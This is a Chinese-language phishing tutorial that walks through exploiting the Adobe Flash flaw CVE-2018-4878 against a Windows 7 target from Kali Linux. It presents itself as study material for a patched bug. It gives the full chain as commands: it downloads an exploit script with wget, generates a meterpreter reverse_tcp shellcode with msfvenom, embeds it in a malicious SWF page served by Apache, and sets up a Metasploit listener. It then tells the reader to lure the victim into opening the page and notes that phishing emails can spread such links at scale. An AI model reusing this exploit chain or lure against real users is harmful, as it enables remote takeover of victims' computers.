文章前言
本篇文章主要介绍如何通过利用Adobe Flash Player的漏洞进行社工钓鱼,该漏洞目前已被修复,在实战中利用已不太奏效,仅作为学习
钓鱼实践
影响范围
Adobe Flash Player<=28.0.0.137
漏洞简介
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞,攻击者可以通过构造特殊的Flash链接,之后诱导用户用浏览器/邮件/Office访问此Flash链接,从而实现"远程代码执行",并且直接被Getshell,该漏洞于2017年底由韩国计算机应急小组(KR-CERT)首次发现
演示环境
攻击主机:Kali Linux
目标主机:Windows 7 sp1
漏洞载荷:CVE-2018-4878.py
flash版本:flashplayer_activex_28.0.0.137.exe
钓鱼演示
Step 1:下载漏洞利用脚本
wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar
Step 2:修改载荷,将代码中的stageless变量改成"stageless = False"
Step 3:使用msf生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.174.131 lport=5678 -f python>shellcode.txt
Step 4:之替换CVE-2018-4878中的shellcode
Step 5:修改CVE-2018-4878.py下面的文件信息
Step 6:使用Python执行CVE-2018-4878.py代码,之后生成exploit.swf文件和index.html文件
Step 7:之后在Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(Apache web路径)
Step 8:Kali Linux开启Shell会话监听
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.174.131
msf exploit(handler) > set lport 5678
msf exploit(handler) > exploit
Step 9:诱导用户通过IE浏览器访问页面
Step 10:Kali Linux 上获取meterpreter shell:
文末小结
从上面的演示中可以看到最终由于Flash存在CVE-2018-4878高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制,真实环境下,很多黑客基于此Flash漏洞,结合社会工程学,例如将网页链接放置在诱导邮件中,欺骗大量用户点击,来达到最规模攻击效果